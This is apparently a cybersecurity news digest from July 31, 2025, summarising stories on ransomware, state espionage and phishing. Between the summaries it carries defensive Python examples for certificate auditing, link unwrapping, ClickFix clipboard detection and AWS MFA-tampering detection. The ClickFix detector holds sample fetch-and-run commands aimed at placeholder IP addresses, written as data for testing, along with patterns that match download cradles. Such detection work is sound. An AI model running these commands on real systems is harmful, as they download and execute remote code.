Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11797
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-07-31 20:11:15 | theregister | CYBERCRIME | Ransomware Threats Escalate with Physical Harm Warning to Victims | Ransomware gangs are increasingly threatening physical violence against employees and their families to compel payment from victim organizations.
A survey by Censuswide for Semperis found that 40% of 1,500 security and IT professionals reported physical threats from attackers.
Conventional extortion threats remain more common: 52% of respondents reported threats to lock them out of their systems and 63% reported threats to destroy data.
Nearly half also reported threats of regulatory complaints, echoing the 2023 case in which the ALPHV/BlackCat gang filed an SEC complaint against its own victim, MeridianLink.
Semperis' report shows that 78% of organizations surveyed faced a ransomware attack in the past year; 56% of these attacks resulted in successful infections.
A notable decline in recovery speed from ransomware attacks was observed, with only 23% recovering within a day, down from 39% the previous year.
Roughly 15% of organizations that paid a ransom did not receive working decryption keys, and 3% had their data leaked anyway.
Semperis' director of breach preparedness and response, Jeff Wichman, emphasized the dangers of paying ransoms, noting that attackers often resell stolen data. | Details |
| 2025-07-31 19:36:56 | theregister | DATA BREACH | Illumina Pays $9.8 Million Over Government Security Flaw Claims | Illumina has settled with the U.S. government for $9.8 million over allegations of selling insecure genetic testing systems.
The Department of Justice claimed Illumina failed to meet required cybersecurity standards while billing government agencies for compliant devices.
The settlement resolves a whistleblower suit alleging that, for more than seven years, Illumina falsely certified that its devices met the required cybersecurity standards.
Illumina controls over 80% of the global genetic testing market, highlighting significant impact potential from the alleged security lapses.
The alleged defects included hardcoded credentials, improperly scoped account privileges, and unaddressed insider-threat risk.
Illumina admitted no wrongdoing and described the settlement as a way to avoid the cost of prolonged litigation.
The company says it has fixed the software issues in question, expressed relief at resolving the matter, and points to its investment in cybersecurity best practices and its commitment to data security and customer relationships. | Details |
| 2025-07-31 18:53:37 | bleepingcomputer | MISCELLANEOUS | Kali Linux Now Supports macOS Containers, Enhances Security Testing | Kali Linux now ships an image that runs inside Apple's new Containerization framework on Apple Silicon Macs.
Apple introduced the framework at WWDC 2025; each container runs in its own lightweight Linux VM, comparable to how WSL2 hosts Linux distributions on Windows.
Users install Apple's `container` CLI (available through Homebrew) and use it to pull, launch and manage the Kali container.
Local directories can be mounted into the container so that files on the macOS host are accessible from Kali.
On macOS Sequoia the tooling is still limited: Intel Macs are not supported, and networking inside containers does not fully work.
There is also no hardware passthrough, so Kali use cases that need direct device access (for example wireless adapters) are off the table.
Despite these bugs and limitations, the integration makes it much simpler to run Kali tooling on macOS. | Details |
| 2025-07-31 18:27:01 | bleepingcomputer | MISCELLANEOUS | Microsoft to Implement Enhanced Excel Security Measures by 2026 | Microsoft plans to disable external workbook links to blocked file types in Excel between October 2025 and July 2026 to enhance security.
Workbooks with links to blocked file types will show a #BLOCKED error or fail to refresh following the update.
This security measure is part of the new FileBlockExternalLinks group policy, expanding current File Block Settings.
Starting with Microsoft 365 version 2509, Excel will show a business-bar warning in workbooks that contain external links to blocked file types.
Admins can re-enable links to blocked file types by modifying the Excel security settings in the Windows registry.
The change follows earlier hardening steps such as disabling ActiveX controls by default and extending Antimalware Scan Interface (AMSI) coverage for better protection against malware.
Microsoft has also recently raised bounty payouts to $40,000 for certain .NET vulnerabilities, part of a broader push on security across its platforms. | Details |
| 2025-07-31 18:10:32 | theregister | MISCELLANEOUS | Microsoft Enhances Azure AI, Raises Deepfake Voice Concerns | Microsoft has updated its Azure AI Speech service to include a new feature that allows users to create voice replicas with just seconds of sampled speech.
The enhanced model, called "DragonV2.1Neural," offers more natural and expressive voice outputs and supports over 100 languages.
The improved system provides better speech naturalness, realistic prosody, and enhanced pronunciation accuracy.
This upgrade enables various applications such as customizing chatbot voices and dubbing video content across multiple languages.
To limit misuse, Microsoft says generated audio is watermarked and its usage policy requires the original speaker's consent and prohibits impersonation.
Concerns have grown around AI voice cloning technology, especially given its application in scams and the lack of sufficient safeguards in some voice cloning services.
Earlier warnings from Consumer Reports and the FBI highlight the risks associated with AI voice cloning technologies in fraud schemes. | Details |
| 2025-07-31 17:28:44 | bleepingcomputer | MISCELLANEOUS | Microsoft Expands .NET Bug Bounty, Offers Up to $40,000 | Microsoft has updated its .NET bug bounty program to increase rewards, offering up to $40,000 for critical vulnerabilities.
The program now includes higher payouts for issues in .NET and ASP.NET Core, reflecting the complexity and risk associated with these vulnerabilities.
Critical remote code execution and privilege escalation flaws can fetch up to $40,000, with $30,000 available for critical security feature bypasses.
The updated bounty program also covers critical remote denial-of-service (DoS) bugs, with rewards up to $20,000.
The program's scope was also broadened to cover more .NET components.
The changes are part of Microsoft's Secure Future Initiative (SFI), which the company expanded in response to criticism of its security practices from DHS's Cyber Safety Review Board.
Microsoft continues incentivizing research and security improvements across its platforms, including enhancements in AI security with increased bounties. | Details |
| 2025-07-31 17:18:41 | theregister | NATION STATE ACTIVITY | China Summons Nvidia Over Alleged Security Flaws in AI Chips | China's Cyberspace Administration says it suspects Nvidia's H20 AI chips contain backdoors and has summoned the company to explain under the country's cybersecurity laws.
The issue emerged after the U.S. lifted a ban that previously blocked the export of these chips to China, originally imposed over fears of military use.
Beijing's renewed scrutiny appears tied to the proposed U.S. Chip Security Act, which would require tracking (location-verification) technology in exported AI chips and has raised espionage fears.
Allegations include embedded technologies in Nvidia's chips for tracking, positioning, and remote shutdown capabilities.
Despite U.S. restrictions, a significant volume of Nvidia's AI chips reportedly entered China's black market, circumventing official channels.
Nvidia denies that its chips contain any backdoor that would allow remote access or control and says it follows stringent cybersecurity practices.
The confrontation underscores how the AI and semiconductor supply chain has become a geopolitical lever for both governments. | Details |
| 2025-07-31 17:18:41 | thehackernews | NATION STATE ACTIVITY | Russian Threat Actor Targets Embassies in Moscow with AitM Attacks | Secret Blizzard, a Russian nation-state actor, is targeting foreign embassies in Moscow via sophisticated AitM attacks at the ISP level.
The group deploys malware called ApolloShadow, which installs a rogue trusted root certificate so that intercepted TLS traffic appears legitimate to the victim device, and maintains persistent access.
The campaign has been active since at least 2024, utilizing local ISPs to compromise diplomatic communications for intelligence gathering.
Microsoft's report describes the tactics: abuse of Russia's lawful-intercept capability at the ISP, a captive portal that redirects the victim's traffic to the malware download, and installation of rogue root certificates.
ApolloShadow also changes host network settings in ways that could ease lateral movement (setting connected networks to the Private profile, which relaxes firewall rules and makes the host discoverable), although Microsoft observed no direct lateral-movement attempts.
Microsoft suggests embassies enforce least privilege access, review privileged accounts regularly, and secure traffic through encrypted tunnels or VPNs to mitigate threats.
The group uses complex methods to obscure its activities, including leveraging infrastructure from unrelated third-party threat actors. | Details |
| 2025-07-31 16:47:20 | bleepingcomputer | MISCELLANEOUS | CISA Launches Thorium: Open-Source Platform for Cybersecurity | CISA announced the availability of Thorium, an open-source platform for malware and forensic analysis designed to automate tasks in cyberattack investigations.
Developed in collaboration with Sandia National Laboratories, Thorium can schedule over 1,700 jobs per second and handles more than 10 million files per hour per permission group.
Thorium integrates commercial, open-source, and custom tools to enhance cybersecurity teams' analytical capabilities in software analysis, digital forensics, and incident response.
The platform enables cybersecurity analysts to efficiently assess complex malware threats and supports various mission functions.
Installation instructions and access to Thorium are available on CISA's official GitHub repository, promoting the use of advanced tools across the cybersecurity community.
Thorium's scalable pipeline applies to benign software as well as malware, for example to assess vulnerabilities in code a team depends on, improving overall security readiness.
Thorium is part of CISA’s continued efforts to support the cybersecurity community, following the release of the Eviction Strategies Tool and the "Malware Next-Gen" analysis system in previous years. | Details |
| 2025-07-31 16:09:01 | theregister | NATION STATE ACTIVITY | Kremlin-Backed Cyber Spies Target Foreign Embassies in Moscow | Russian cyberspies, attributed to the Kremlin-backed group Secret Blizzard, are targeting foreign embassies in Moscow using local ISP networks.
Microsoft Threat Intelligence has tracked the espionage since at least 2024 and attributes it to adversary-in-the-middle (AiTM) attacks that were most likely enabled by Russia's lawful-intercept capability at the ISPs.
The attackers employ fake networks and captive portals to redirect embassy communications and deploy the ApolloShadow malware.
ApolloShadow facilitates extensive privileges on compromised devices, enabling manipulation of network settings and data interception.
Once infected, ApolloShadow can manipulate DNS settings to redirect communications to a control server, exposing sensitive diplomatic communications.
Microsoft advises entities in Moscow to use encrypted communication channels or VPNs not reliant on local ISPs to mitigate risk.
The case shows how state control over ISPs turns local network infrastructure into an extension of espionage capability. | Details |
| 2025-07-31 16:09:00 | bleepingcomputer | NATION STATE ACTIVITY | Russian Hackers Target Embassies Using ISP-Level Espionage | Microsoft has identified a Russian hacker group, Secret Blizzard, targeting diplomatic missions in Moscow using local ISP access.
The hackers run Adversary-in-the-Middle (AiTM) attacks that redirect targets through a captive portal to a page that serves the ApolloShadow malware.
ApolloShadow malware installs a deceptive trusted root certificate mimicking Kaspersky Anti-Virus, facilitating long-term espionage.
The cyber-espionage tactics leverage Russia’s System for Operative Investigative Activities (SORM) for extensive AiTM campaigns.
This cyber threat has been monitored actively by Microsoft since 2024, with Secret Blizzard's ISP-level espionage capabilities newly confirmed.
Secret Blizzard, linked to the Russian FSB, has been involved in global cyber-espionage since 1996, targeting sensitive government and research entities.
The group is known for unconventional tradecraft, including controlling malware via social media and hijacking other nations' state-sponsored infrastructure for its own operations. | Details |
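For the three Secret Blizzard items above, the check a defender wants is an audit of the Windows trusted root store for additions like the one ApolloShadow makes. The following Python is an added example, not Microsoft's or any of the articles' code: it parses the text output of `certutil -store Root`, compares every root against an approved thumbprint baseline, and flags roots that are unapproved, that borrow a security vendor's name without a matching known thumbprint, or that were issued recently. The sample store output, the "Kaspersky" subject, every thumbprint, the baseline and the snapshot time are constructed for the example; certutil prints dates in the host locale, so `DATE_FMT` (en-US here) is an assumption to adjust.

```python
from __future__ import annotations

import re
from datetime import datetime, timedelta

# Constructed sample of `certutil -store Root` output. Only the layout mirrors
# certutil; the second entry, its subject and every thumbprint are made up.
SAMPLE_STORE = """\
Root "Trusted Root Certification Authorities"
================ Certificate 0 ================
Serial Number: 01
Issuer: CN=Example Root CA, O=Example Corp, C=US
 NotBefore: 1/1/2015 12:00 AM
 NotAfter: 1/1/2035 12:00 AM
Subject: CN=Example Root CA, O=Example Corp, C=US
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff 00 11 22 33 44
No key provider information
================ Certificate 1 ================
Serial Number: 02
Issuer: CN=Kaspersky Anti-Virus Root CA, O=AO Kaspersky Lab
 NotBefore: 7/28/2025 9:14 AM
 NotAfter: 7/28/2035 9:14 AM
Subject: CN=Kaspersky Anti-Virus Root CA, O=AO Kaspersky Lab
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): de ad be ef de ad be ef de ad be ef de ad be ef de ad be ef
No key provider information
CertUtil: -store command completed successfully.
"""

# When the constructed snapshot above was taken (assumed).
SNAPSHOT_TIME = datetime(2025, 7, 31, 12, 0)

# Approved roots for this fleet (hypothetical thumbprint), keyed by SHA-1.
BASELINE = {"112233445566778899AABBCCDDEEFF0011223344": "Example Root CA"}

# Vendor names a rogue root is likely to borrow; a match outside the baseline is suspicious.
VENDOR_WORDS = ("kaspersky", "microsoft", "digicert", "globalsign", "sectigo", "entrust")

CERT_SPLIT = re.compile(r"^=+ Certificate \d+ =+$", re.M)
FIELD = re.compile(r"^\s*(Issuer|Subject|NotBefore|NotAfter|Cert Hash\(sha1\)):\s*(.+?)\s*$", re.M)
DATE_FMT = "%m/%d/%Y %I:%M %p"  # certutil's en-US layout; locale-dependent


def parse_certutil(text: str) -> list[dict]:
    """Turn `certutil -store Root` output into one dict per certificate."""
    certs = []
    for block in CERT_SPLIT.split(text)[1:]:
        fields = dict(FIELD.findall(block))
        if "Cert Hash(sha1)" not in fields:
            continue
        certs.append({
            "subject": fields.get("Subject", ""),
            "issuer": fields.get("Issuer", ""),
            "not_before": datetime.strptime(fields["NotBefore"], DATE_FMT),
            "sha1": fields["Cert Hash(sha1)"].replace(" ", "").upper(),
        })
    return certs


def audit_roots(text: str, baseline: dict, now: datetime, recent_days: int = 30) -> list[dict]:
    """Report roots that are unapproved, impersonate a vendor, or were issued recently."""
    findings = []
    for cert in parse_certutil(text):
        reasons = []
        if cert["sha1"] not in baseline:
            reasons.append("thumbprint not in approved baseline")
            vendor = next((w for w in VENDOR_WORDS if w in cert["subject"].lower()), None)
            if vendor:
                reasons.append(f"subject claims '{vendor}' but thumbprint is not a known {vendor} root")
        age = now - cert["not_before"]
        if age <= timedelta(days=recent_days):
            reasons.append(f"issued {age.days} days ago")
        if reasons:
            findings.append({"sha1": cert["sha1"], "subject": cert["subject"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_roots(SAMPLE_STORE, BASELINE, SNAPSHOT_TIME):
        print(f["sha1"], f["subject"], *f["reasons"], sep="\n  ")
```

On a real host, capture the store with `certutil -store Root > roots.txt` and feed the file to `audit_roots`; a legitimately deployed vendor root (Kaspersky's own TLS-inspection root, for instance) belongs in the baseline by thumbprint, which is exactly why the check keys on the hash rather than the name.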
| 2025-07-31 15:51:19 | thehackernews | CYBERCRIME | New Phishing Scam Abuses Proofpoint to Steal Microsoft 365 Credentials | Cybersecurity researchers have uncovered a sophisticated phishing campaign that exploits Proofpoint’s link wrapping service to mask malicious URLs and evade detection.
Attackers first compromise an email account inside an organization that uses Proofpoint; outbound mail from that account has its links rewritten by Proofpoint's URL Defense, so the malicious URL is sent under the trusted urldefense.com domain.
The emails chain redirects: the attacker first shortens the phishing URL with a service such as Bitly, and Proofpoint then wraps that shortened link, producing a multi-hop redirection that defeats simple URL-reputation checks.
This technique is employed in various deceptive emails, such as fake voicemail notifications and Microsoft Teams messages, which trick users into clicking on links that lead to fake Microsoft 365 login pages designed to harvest credentials.
The phishing campaign also utilizes Scalable Vector Graphics (SVG) files and fake Zoom meeting links in separate schemes to bypass traditional security protocols and trick users into divulging personal information.
Cloudflare highlights the increasing sophistication of phishing attacks that cleverly use trusted tools and methodologies to increase their success rate in credential theft.
Recent reports by Cofense and other cybersecurity entities indicate a rise in such multi-stage phishing attacks, signaling a shift towards more elaborate and covert methods of cybercrime. | Details |
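As an added example, not code from the article or from Cloudflare's research, the following Python unwraps Proofpoint URL Defense v2 and v3 links and classifies where the chain ends, which is the triage step a SOC needs when a wrapped link arrives. The v2 decoding (`-` back to `%`, `_` back to `/`, then percent-decode) and the v3 decoding (`*` placeholders filled from a base64url blob, `**X` for runs) follow Proofpoint's publicly documented scheme; treat that as an assumption and validate against Proofpoint's own decoder before relying on it. The wrapped links, hostnames and keyword lists are constructed for the example, and the code deliberately does not follow shortener links, which needs an HTTP request from a sandbox.

```python
from __future__ import annotations

import base64
import re
from urllib.parse import parse_qs, unquote, urlparse

# Proofpoint URL Defense wrappers come in two on-the-wire formats:
#   v2: https://urldefense.proofpoint.com/v2/url?u=<enc>&d=...&c=...
#       <enc> is the percent-encoded target with '%' -> '-' and '/' -> '_'.
#   v3: https://urldefense.com/v3/__<target with * placeholders>__;<b64url>!!<key>$
#       each '*' stands for one character taken in order from the base64url blob,
#       and '**X' for a run of (index of X in RUN_ALPHABET + 2) characters.
V2_RE = re.compile(r"^https?://urldefense(?:\.proofpoint)?\.com/v2/url\?", re.I)
V3_RE = re.compile(
    r"^https?://urldefense(?:\.proofpoint)?\.com/v3/__(?P<url>.+?)__;(?P<enc>[^!]*)!", re.I
)
V3_TOKEN_RE = re.compile(r"\*(\*.)?")
RUN_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"

# Where a Microsoft 365 login really lives, versus hosts that merely borrow the words.
MICROSOFT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com", "login.microsoft.com"}
LURE_WORDS = ("microsoft", "office", "o365", "365", "sharepoint", "teams", "voicemail", "login", "signin", "sso")
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "rebrand.ly", "cutt.ly"}


def decode_v2(url: str) -> str | None:
    """Return the target of a v2 wrapper, or None if `url` is not one."""
    if not V2_RE.match(url):
        return None
    enc = parse_qs(urlparse(url).query).get("u", [""])[0]
    if not enc:
        return None
    return unquote(enc.translate(str.maketrans("-_", "%/")))


def decode_v3(url: str) -> str | None:
    """Return the target of a v3 wrapper, or None if `url` is not one."""
    m = V3_RE.match(url)
    if not m:
        return None
    blob = m.group("enc")
    blob += "=" * (-len(blob) % 4)  # the blob is transmitted without padding
    pool = base64.urlsafe_b64decode(blob).decode("utf-8", "replace")
    pos = 0

    def fill(tok: re.Match) -> str:
        nonlocal pos
        t = tok.group(0)
        n = 1 if t == "*" else RUN_ALPHABET.find(t[2]) + 2
        chunk, pos = pool[pos:pos + n], pos + n
        return chunk

    # Percent-escapes already present in the target are left untouched.
    return V3_TOKEN_RE.sub(fill, m.group("url"))


def unwrap(url: str, max_layers: int = 5) -> list[str]:
    """Peel URL Defense wrappers repeatedly; returns every layer, outermost first."""
    chain = [url]
    for _ in range(max_layers):
        inner = decode_v2(chain[-1]) or decode_v3(chain[-1])
        if inner is None:
            break
        chain.append(inner)
    return chain


def assess(url: str) -> dict:
    """Classify where a (possibly wrapped) link actually points."""
    chain = unwrap(url)
    final = chain[-1]
    host = (urlparse(final).hostname or "").lower()
    if host in MICROSOFT_LOGIN_HOSTS:
        verdict = "microsoft"
    elif host in SHORTENERS:
        verdict = "shortener"  # still opaque: resolve it with a HEAD request from a sandbox
    elif any(w in host for w in LURE_WORDS):
        verdict = "lookalike"  # Microsoft-flavoured name on a non-Microsoft host
    else:
        verdict = "unknown"
    return {"layers": len(chain) - 1, "final": final, "host": host, "verdict": verdict}


if __name__ == "__main__":
    # Constructed sample: a shortener link wrapped by URL Defense v2, as in the campaign.
    print(assess("https://urldefense.proofpoint.com/v2/url?u=https-3A__bit.ly_3xAbCd&d=DwMFaQ&c=x&r=y&m=z&s=w&e="))
```

The point of the `shortener` verdict is that a urldefense.com link resolving to Bitly is not a clean result: the wrapper only tells you the first hop, and the reputation of the wrapping domain says nothing about the final page.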
| 2025-07-31 15:05:03 | theregister | NATION STATE ACTIVITY | Chinese Espionage Crew Patented Offensive Cyber Tools, DOJ Reveals | Security researchers at SentinelLabs analyzed an unsealed US DOJ indictment, identifying 16 patents related to offensive cyber tools linked to China's Ministry of State Security (MSS).
The patents, filed between 2014 and 2020 by Shanghai Powerock and Shanghai Huayun Firetech, were connected to the Silk Typhoon espionage team, known for their attack on Microsoft Exchange.
The tools patented included utilities for decrypting hard drives, network sniffers, forensic software, and spyware capable of accessing files on Apple devices.
The Chinese companies involved had previously operated under non-publicized alliances with MSS, supporting ongoing cyber espionage efforts.
Yin Kecheng, linked to similar intrusions through Shanghai Heiying Information Technology, was charged earlier this year over profit-driven computer intrusion campaigns dating back to 2013.
SentinelLabs notes that, while the patented tools could in theory serve defensive purposes, there is no evidence they were used that way, and their design points clearly at espionage.
Despite the indictments and the documented links, Beijing continues to deny any involvement in cyber espionage. | Details |
| 2025-07-31 14:19:09 | bleepingcomputer | CYBERCRIME | Prevention and Impact of Clipboard-Based ClickFix and FileFix Attacks | ClickFix is a social engineering method used by attackers to manipulate users into executing malicious code hidden in their clipboard.
The lure is usually something that looks routine, such as a CAPTCHA or a "fix" for a broken page; clicking it silently copies a command to the clipboard, and the page then instructs the user to open the Windows Run dialog (Win+R), paste, and press Enter, which executes the command.
Keep Aware, a browser security platform, is highlighted for its ability to detect and block these deceptive interactions through clipboard monitoring and real-time activity analysis.
An instance of an attack was prevented when Keep Aware alerted a user of a suspicious command after a ClickFix attempt that originated from a search engine result.
ClickFix attacks, if successful, can lead to the loading of various malware and remote access trojans, causing significant harm to the compromised device.
FileFix is the latest variant: the user is told to paste a string into the File Explorer address bar, where text that looks like an innocuous file path is actually a command that Explorer executes.
These clipboard-based attacks show that the browser is a key vector for device compromise, one that traditional endpoint and email controls largely overlook. | Details |
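As an added example, not Keep Aware's or the article's code, the following Python implements the kind of clipboard check the item describes: before a paste into the Run dialog, a terminal or the File Explorer address bar, it decodes a PowerShell `-EncodedCommand` payload (base64 of UTF-16LE) if one is present and scores the visible and decoded text against download-cradle, execution, evasion, remote-target and lure-text indicators. The clipboard samples, hosts and IP addresses (documentation ranges) are constructed; the indicator lists and the blocking rule are illustrative choices, not an exhaustive signature set.

```python
from __future__ import annotations

import base64
import re


def encode_command(ps: str) -> str:
    """Build a -EncodedCommand argument the way a lure page does (base64 of UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


# Constructed clipboard contents in the shape ClickFix/FileFix lures produce
# (documentation IP ranges; not samples taken from the article).
SAMPLES = {
    "clickfix_encoded": "powershell -w hidden -ep bypass -enc "
    + encode_command("iwr http://198.51.100.7/a.ps1 | iex"),
    "clickfix_mshta": 'mshta http://203.0.113.5/captcha.hta  # "I am not a robot - reCAPTCHA Verification ID: 7811"',
    # FileFix: a command padded with a comment so the Explorer address bar shows only a "path"
    "filefix_path": 'powershell -c "curl -s http://203.0.113.5/x | iex" # C:\\Users\\Public\\report.pdf',
    "benign": "C:\\Users\\Public\\Documents",
}

# -e, -ec, -enc, -EncodedCommand ... followed by a base64 blob.
ENCODED_RE = re.compile(r"[-/]e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

INDICATORS = {
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|bitsadmin|start-bitstransfer)\b"
        r"|certutil\s+-urlcache", re.I),
    "execution": re.compile(
        r"\b(?:iex|invoke-expression|mshta|rundll32|regsvr32|wscript|cscript)\b|\|\s*(?:sh|bash)\b", re.I),
    "evasion": re.compile(
        r"-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I),
    "remote_target": re.compile(r"https?://|\b\d{1,3}(?:\.\d{1,3}){3}\b|\\\\[\w.-]+\\", re.I),
    "lure_text": re.compile(r"captcha|verification id|not a robot|verify you are human", re.I),
}


def decode_encoded_command(clip: str) -> str | None:
    """Recover the script hidden behind powershell -EncodedCommand, or None."""
    m = ENCODED_RE.search(clip)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_clipboard(clip: str) -> dict:
    """Score clipboard text the user is about to paste into Run, a shell, or Explorer."""
    decoded = decode_encoded_command(clip)
    text = clip if decoded is None else clip + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # A remote target plus a cradle or an executor is enough to block the paste;
    # an encoded command in clipboard text is itself a strong signal.
    block = decoded is not None or (
        "remote_target" in hits and bool({"download_cradle", "execution"} & set(hits))
    )
    return {"decoded": decoded, "hits": hits, "score": len(hits), "block": block}


if __name__ == "__main__":
    for name, clip in SAMPLES.items():
        print(name, analyze_clipboard(clip))
```

The decode step matters more than the regex list: the visible Run-dialog text in a ClickFix lure is often just `powershell -w hidden -enc ...`, and every indicator worth matching lives inside the base64.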
| 2025-07-31 13:51:42 | thehackernews | NATION STATE ACTIVITY | North Korean Hackers Target Crypto Firms Via Social Engineering | North Korea-linked UNC4899 engaged in sophisticated cryptocurrency theft targeting multiple organizations through social engineering via LinkedIn and Telegram.
The attackers employed malicious Docker containers and npm packages to infiltrate systems, leveraging job offers and collaborative project lures on platforms like GitHub.
UNC4899, also known as Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor, has been active since 2020 and is associated with significant crypto heists.
The group exploited cloud environments such as Google Cloud and AWS, using malware like GLASSCANNON, PLOTTWIST, and MAZEWIRE to establish remote connections and perform actions like credential theft.
In one instance, malicious actors disabled and later reinstated MFA to maintain access without detection.
The operations concluded with the threat actors successfully extracting millions in cryptocurrency by manipulating CloudFront and S3 configurations.
Google's report notes that the attackers relied on stolen credentials and session cookies, and that in some cases MFA requirements blocked their attempts at further access.
The activity forms part of a broader strategy by North Korea's Lazarus Group, which has escalated inserting malware into npm and PyPI open source registries. | Details |
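The disable-then-reinstate MFA step described above is detectable from CloudTrail. The following Python is an added example, not Google's, Mandiant's or the article's code: it scans IAM events for a `DeactivateMFADevice` on a user that is followed by an `EnableMFADevice` for the same user within a window (the pattern that leaves the account's MFA status looking normal afterwards), and separately reports deactivations never followed by a re-enable. The records are constructed and trimmed to the fields used; the event names are the real IAM API calls CloudTrail logs, while the 24-hour window and the account/user names are assumptions.

```python
from __future__ import annotations

from datetime import datetime, timedelta

# Constructed CloudTrail records, trimmed to the fields used here (not from the report).
RECORDS = [
    {"eventTime": "2025-07-10T02:14:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "DeactivateMFADevice", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/deploy-admin"},
     "requestParameters": {"userName": "deploy-admin",
                           "serialNumber": "arn:aws:iam::111122223333:mfa/deploy-admin"}},
    {"eventTime": "2025-07-10T02:15:30Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateVirtualMFADevice", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/deploy-admin"},
     "requestParameters": {"virtualMFADeviceName": "deploy-admin"}},
    {"eventTime": "2025-07-10T02:16:05Z", "eventSource": "iam.amazonaws.com",
     "eventName": "EnableMFADevice", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/deploy-admin"},
     "requestParameters": {"userName": "deploy-admin",
                           "serialNumber": "arn:aws:iam::111122223333:mfa/deploy-admin"}},
    {"eventTime": "2025-07-10T09:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "DeactivateMFADevice", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/alice"},
     "requestParameters": {"userName": "alice",
                           "serialNumber": "arn:aws:iam::111122223333:mfa/alice"}},
    {"eventTime": "2025-07-10T09:05:00Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/alice"},
     "requestParameters": None},
]

# DeleteVirtualMFADevice also removes MFA but carries only serialNumber, so a
# production rule would correlate it by serial; this example keys on userName.
DISABLE_EVENTS = {"DeactivateMFADevice"}
ENABLE_EVENTS = {"EnableMFADevice"}


def _ts(rec: dict) -> datetime:
    return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _target_user(rec: dict) -> str | None:
    return (rec.get("requestParameters") or {}).get("userName")


def find_mfa_tampering(records: list[dict], window: timedelta = timedelta(hours=24)) -> list[dict]:
    """Pair each MFA deactivation with a re-enable on the same user inside `window`;
    report those pairs and any deactivation that was never followed by a re-enable."""
    iam = sorted((r for r in records if r.get("eventSource") == "iam.amazonaws.com"), key=_ts)
    pending: dict[str, dict] = {}  # target user -> the DeactivateMFADevice record
    findings = []
    for rec in iam:
        user = _target_user(rec)
        if not user:
            continue
        if rec["eventName"] in DISABLE_EVENTS:
            pending.setdefault(user, rec)
        elif rec["eventName"] in ENABLE_EVENTS and user in pending:
            first = pending.pop(user)
            gap = _ts(rec) - _ts(first)
            if gap <= window:
                findings.append({
                    "kind": "mfa_reset", "user": user, "gap_seconds": gap.total_seconds(),
                    "actor": first["userIdentity"]["arn"], "source_ip": first["sourceIPAddress"],
                    "new_device": rec["requestParameters"].get("serialNumber"),
                })
    for user, first in pending.items():
        findings.append({"kind": "mfa_left_disabled", "user": user,
                         "actor": first["userIdentity"]["arn"], "source_ip": first["sourceIPAddress"]})
    return findings


if __name__ == "__main__":
    for f in find_mfa_tampering(RECORDS):
        print(f)
```

A reset completed in two minutes by the same identity from an unfamiliar source address is the case to page on: the attacker has swapped the MFA device for one they control, and a point-in-time "all users have MFA" report will not show it.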